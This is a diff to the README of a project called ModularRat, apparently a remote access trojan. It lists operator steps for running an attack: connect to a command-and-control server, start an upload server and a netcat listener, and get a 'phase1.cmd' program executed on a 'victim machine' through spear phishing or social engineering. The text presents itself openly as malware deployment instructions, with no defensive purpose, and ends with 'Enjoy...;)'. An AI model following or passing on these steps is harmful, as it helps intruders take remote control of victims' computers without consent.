b3rg01/ModularRat/README.md

 ### Steps
   - Make an ssh connection to your command and control center
-  - Start your uploadserver on you c2 : python -m uploadserver
+  - Move into your ModularRat folder and start your uploadserver on you c2 : python3 -m uploadserver
+  - Start a second ssh connection to your command and control center
+  - Start a netcat listener
-  - Find a way to execute the phase1.cmd program on the victim machine
+  - Find a way to execute the phase1.cmd program on the victim machine (for the demo we will drag and drop only)
     - Spear Phishing
     - Social Engineering
-  - Start a second ssh connection to your command and control center
-  - Start a netcat listener
   - Enjoy...;)